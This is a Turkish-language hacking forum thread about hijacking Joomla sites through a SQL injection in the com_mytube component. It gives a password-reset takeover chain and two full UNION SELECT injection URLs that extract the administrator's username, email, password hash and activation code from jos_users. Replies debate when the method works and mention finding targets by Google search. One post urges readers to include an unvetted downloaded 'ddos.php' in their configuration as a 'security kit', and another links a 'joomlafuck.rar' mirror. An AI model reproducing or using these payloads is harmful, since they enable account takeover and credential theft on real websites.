




Joomla Hacking Video İzle Hackle
-
video da kullanılan açık kurulan 3. parti modülün açığı joomlanın değil. ayrıca administrator kullanıcı adı admin değilse bi işe yaramaz ordaki yöntem
-
resetleme kod:
index.php?option=com_user&view=reset
index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
email e gelen kodu çagırma
index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat(0x3a,username,0x3a,email,0x3a,activation),13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
not hacklenmeyen diyen arkadaşa hacklediniz yerleri verdinde sussun :D
-
joomlaya güvenlik için isteyen kardeşlerime güvenlik paketi veriyorum
jomla configuration.php içine
include("ddos.php");
diye ekleyin
http://rapidshare.com/files/286922104/ddos.php
bunuda sitenin ana dizinine koyun artık ne rfi ne sql injection hiç bişeyi takmayın bu kit sizi korur
-
-
arkadaşım ben hacklenmez demiyorum hacklenir ama bu joomlanın değil orada joomlaya sonradan kurulan 3. parti mytube componentinin açığıdır
eğer joomla kurulu sitede com_mytube yoksa yani mytube componenti kurulu değilse bu yöntemle hacleyemezsin bu bir.
ikincisi sen 62 nolu kullanıcının parolasını sıfırlıyorsun 62 nolu kullanıcı joomla da yöneticidir. ilk kurulumda adı admin olarak gelir buraya kadar tamam
ama yönetici admin kullanıcı adını değiştirdiyse parolayı sıfırlasanda kullanıcı adını bilmediğin için yine sisteme giremezsin.
bir de joomlayı kuran arkadaş biraz bilincliyse ve 62 olarak gelen yonetici id sini değiştirdiyse yine sisteme giremezsin.
siteyi yapan lamer olunca hackleyenin hacker olmasına gerek olmuyor işin açığı.
-
kurnaazz bak konuşmuyum diyorumda konuşturuyorsun sql den admin usernamesini çagırıyorum ona göre yazıyorum zaten kullanıcı adını ben şifreyi resetliyimde sen admin değiştir ne yaparsan yap hackedsin oke oradaki sql sorgusununa bak hex ile ayrılmış x03a ile
-
tmm admin username i sıfırladın neye göre sql koddaki user_id=62 e göre 62 inci id admin oluyor tmm bunda sorun yoq
ben diyorum ki adam bilinçliyse admin id sini 62 olarak bırakmaz sende adminin idsini bilmiyorsan birşey yapamazsın
haa com_mytube kurulu değilse zaten çalışmayacak kod.
bunlarda anlaştık mı güzel kardeşim
geri kalan kısmına lafım yok
edit: zaten sende mytube eklentisi kurulu olanları aramışsın google dan
-
hehehhe yakışır echoll hocayaaa :)
-
turkdepo mirror : http://turkdepo.net/w6es3cbqwsh4/joomlafuck.rar.html
-
Cok guzel yontem, kurnazlık gerektirir :) anladıgım kadarıyla butun sql eklentilerinde calısır. nede olsa aktivasyon kodunu diger acıklanan sql acıklarında cıkartabılırız.